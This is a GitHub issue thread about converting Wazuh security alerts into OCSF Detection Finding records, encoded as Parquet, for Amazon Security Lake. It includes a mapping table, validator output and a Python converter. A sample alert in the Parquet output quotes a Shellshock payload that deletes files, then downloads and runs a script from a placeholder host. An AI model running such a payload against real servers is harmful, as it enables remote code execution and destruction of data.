Amazon Security Lake integration - Data transform and delivery (DTD) #145

Closed
5 tasks done
Tracked by #128
AlexRuiz7 opened this issue Jan 31, 2024 · 3 comments
Labels
level/task Task issue type/enhancement Enhancement issue

Comments

@AlexRuiz7
Member

AlexRuiz7 commented Jan 31, 2024

Description

Now that we know how OCSF works, how to encode data in Parquet and how to implement a Logstash pipeline to send events to an S3 bucket from wazuh-indexer indexes, we need to bundle it all together and prepare the data before sending it to AWS.

As explained in #113, we need to transform the data within the pipeline, so that it reaches the Amazon Security Lake S3 bucket already in OCSF format and encoded as Parquet.

To transform the data, we'll explore two approaches: a Lambda function and a Python script. The main difference between them is the resources required, as the Lambda function needs an auxiliary S3 bucket.

Tasks

Subtasks

Definition of done

These two proposals will be worked on in parallel. As soon as we get one of them working, we can consider this issue completed. Once that happens, we'll discuss the next steps.

@kclinden

Has sending the data to a Kinesis Firehose with data transformation to parquet been considered?
https://docs.aws.amazon.com/firehose/latest/dev/record-format-conversion.html

@AlexRuiz7
Member Author

Together with the @wazuh/threat-intel team, we have worked on the mappings that transform our data to the OCSF schema. We'll use the Detection Finding (2004) class, added in the v1.1.0 release of OCSF. The first proposal was to use the Security Finding (2001) class, but it was discarded because that class is deprecated in the latest version of OCSF.

OCSF Version: 1.1.0

| OCSF | Value |
|---|---|
| category_uid | 2 |
| category_name | Findings |
| class_uid | 2004 |
| class_name | Detection Finding |
| type_uid | 200401 |
| metadata.product.name | Wazuh |
| metadata.product.vendor_name | Wazuh, Inc,. |
| metadata.product.version | 4.9.0 |
| metadata.product.lang | en |
| metadata.log_name | Security events |
| metadata.log_provider | Wazuh |
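
As a small worked example, the `type_uid` value above follows the OCSF convention of combining the class UID with the activity ID (`activity_id` is 1 in this mapping). The helper name `type_uid` is only illustrative and not part of any Wazuh or OCSF library.

```python
def type_uid(class_uid: int, activity_id: int) -> int:
    """Compose an OCSF type_uid as class_uid * 100 + activity_id."""
    return class_uid * 100 + activity_id


# Detection Finding (2004) with activity_id 1
print(type_uid(2004, 1))  # 200401
```
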
| OCSF (2004) | Wazuh event field |
|---|---|
| activity_id | 1 |
| time | timestamp |
| message | rule.description |
| count | rule.firedtimes |
| finding_info.uid | id |
| finding_info.title | rule.description |
| finding_info.types | input.type |
| finding_info.analytic.category | rule.groups |
| finding_info.analytic.name | decoder.name |
| finding_info.analytic.type | Rule |
| finding_info.analytic.type_id | 1 |
| finding_info.analytic.uid | rule.id |
| risk_score | rule.level |
| finding_info.attacks.tactic.name | rule.mitre.tactic |
| finding_info.attacks.technique.name | rule.mitre.technique |
| finding_info.attacks.technique.uid | rule.mitre.id |
| finding_info.attacks.version | v13.1 |
| unmapped | rule.nist_800_53 |
| severity_id | convert(rule.level) |
| status_id | 99 |
| resources.name | agent.name |
| resources.uid | agent.id |
| unmapped | ['_index', 'location', 'manager.name'] |
| raw_data | full_log |
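
The Wazuh event fields above are written as dotted paths into the alert document. A minimal sketch of resolving such a path against a nested dictionary, returning a default when a field is missing (optional blocks such as `rule.mitre` may not be present on every alert). The helper name `dig` and the sample event are assumptions made for illustration; the sample values are taken from the alert shown in this thread.

```python
from typing import Any


def dig(event: dict, path: str, default: Any = None) -> Any:
    """Resolve a dotted path such as "rule.mitre.tactic" in a nested dict.

    Returns `default` as soon as any key along the path is missing.
    """
    node: Any = event
    for key in path.split("."):
        if not isinstance(node, dict) or key not in node:
            return default
        node = node[key]
    return node


# Hypothetical, trimmed-down alert used only to exercise the helper.
sample = {
    "rule": {"id": "31166", "description": "Shellshock attack attempt", "level": 6},
    "agent": {"id": "000", "name": "redacted.com"},
}

print(dig(sample, "rule.description"))              # Shellshock attack attempt
print(dig(sample, "rule.mitre.tactic", default=[]))  # []
```

With a helper like this, a missing optional field yields an empty value instead of raising `KeyError` in the middle of the conversion.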

Originally posted by @IsExec in https://github.com/wazuh/internal-devel-requests/issues/699#issuecomment-1933401673

To check that these mappings work and produce OCSF-compliant data, we have used the validate tool from amazon-security-lake-ocsf-validation, which had to be updated (link redirects to the updated version), together with the CLI Python module parquet-tools.

parquet-tools show parquet/wazuh-event.ocsf.parquet
+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
|   activity_id | category_name   |   category_uid | class_name        |   class_uid |   count | message                   | finding_info                                                                                                                                                                                                                                                                                                                                                                                                                           | metadata                                                                                                                                                | raw_data                                                                                                                                                                                                                | resources                                |   risk_score |   severity_id |   status_id | time                         |   type_uid | unmapped                                                                            |
|---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------|
|             1 | Findings        |              2 | Detection Finding |        2004 |       1 | Shellshock attack attempt | {'analytic': {'category': 'web,accesslog,attack', 'name': 'web-accesslog', 'type_id': 1, 'uid': '31166'}, 'attacks': {'tactic': {'name': 'Privilege Escalation,Initial Access'}, 'technique': {'name': 'Exploitation for Privilege Escalation,Exploit Public-Facing Application', 'uid': 'T1068,T1190'}, 'version': 'v13.1'}, 'title': 'Shellshock attack attempt', 'types': array(['log'], dtype=object), 'uid': '1707402914.872885'} | {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'} | 000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 162 "-" "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'" | [{'name': 'redacted.com', 'uid': '000'}] |            6 |             6 |          99 | 2024-02-08T11:35:14.334-0300 |     200401 | {'data_sources': array(['wazuh-alerts-4.x-2024.02.08', '/var/log/nginx/access.log', |
|               |                 |                |                   |             |         |                           |                                                                                                                                                                                                                                                                                                                                                                                                                                        |                                                                                                                                                         |                                                                                                                                                                                                                         |                                          |              |               |             |                              |            |        'redacted.com'], dtype=object), 'nist': array(['SI.4'], dtype=object)}       |
+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
python validate.py -i ../../wazuh-indexer/integrations/amazon-security-lake/parquet/output -version ocsf_schema_1.1.0
Attempting to Validate File: wazuh-event.ocsf.parquet...

Validating Against Event Class: detection_finding (2004)...

VALID OCSF.
Python mappings to OCSF

#!/usr/bin/python

# event comes from Filebeat
event = {}


def normalize(level: int) -> int:
    """
    Normalizes rule level into the 0-6 range, required by OCSF.
    """
    # TODO normalization
    return level


def join(iterable, separator=","):
    """Joins an iterable of strings into a single separator-delimited string."""
    return separator.join(iterable)


def convert(event: dict) -> dict:
    """
    Converts Wazuh events to OCSF's Detection Finding (2004) class.
    """
    ocsf_class_template = \
        {
            "activity_id": 1,
            "category_name": "Findings",
            "category_uid": 2,
            "class_name": "Detection Finding",
            "class_uid": 2004,
            "count": event["_source"]["rule"]["firedtimes"],
            "message": event["_source"]["rule"]["description"],
            "finding_info": {
                "analytic": {
                    "category": join(event["_source"]["rule"]["groups"]),
                    "name": event["_source"]["decoder"]["name"],
                    "type_id": 1,
                    "uid": event["_source"]["rule"]["id"],
                },
                "attacks": {
                    "tactic": {
                        "name": join(event["_source"]["rule"]["mitre"]["tactic"]),
                    },
                    "technique": {
                        "name": join(event["_source"]["rule"]["mitre"]["technique"]),
                        "uid": join(event["_source"]["rule"]["mitre"]["id"]),
                    },
                    "version": "v13.1"
                },
                "title": event["_source"]["rule"]["description"],
                "types": [
                    event["_source"]["input"]["type"]
                ],
                "uid": event["_source"]['id']
            },
            "metadata": {
                "log_name": "Security events",
                "log_provider": "Wazuh",
                "product": {
                    "name": "Wazuh",
                    "lang": "en",
                    "vendor_name": "Wazuh, Inc,."
                },
                "version": "1.1.0",
            },
            "raw_data": event["_source"]["full_log"],
            "resources": [
                {
                    "name": event["_source"]["agent"]["name"],
                    "uid": event["_source"]["agent"]["id"]
                },
            ],
            "risk_score": event["_source"]["rule"]["level"],
            "severity_id": normalize(event["_source"]["rule"]["level"]),
            "status_id": 99,
            "time": event["_source"]["timestamp"],
            "type_uid": 200401,
            "unmapped": {
                "data_sources": [
                    event["_index"],
                    event["_source"]["location"],
                    event["_source"]["manager"]["name"]
                ],
                "nist": event["_source"]["rule"]["nist_800_53"],  # Array
            }
        }

    return ocsf_class_template
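
The `normalize` function above is still a TODO and returns the rule level unchanged, which only stays within the 0-6 range for low levels. Below is a minimal sketch of one possible bucketing. The thresholds are hypothetical and have not been agreed in this issue; the names on the right are the OCSF `severity_id` labels.

```python
# Hypothetical thresholds: (minimum rule level, OCSF severity_id), highest first.
SEVERITY_THRESHOLDS = [
    (15, 5),  # Critical
    (11, 4),  # High
    (8, 3),   # Medium
    (4, 2),   # Low
    (0, 1),   # Informational
]


def normalize(level: int) -> int:
    """Map a Wazuh rule level to an OCSF severity_id (assumed buckets)."""
    for minimum, severity_id in SEVERITY_THRESHOLDS:
        if level >= minimum:
            return severity_id
    return 0  # Unknown: negative or otherwise unexpected level


print(normalize(6))   # 2
print(normalize(12))  # 4
```

Keeping the thresholds in a table makes them easy to adjust once the final mapping is decided.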

@AlexRuiz7
Member Author

I'm working on an event generator tool to test the integration and ease its development.
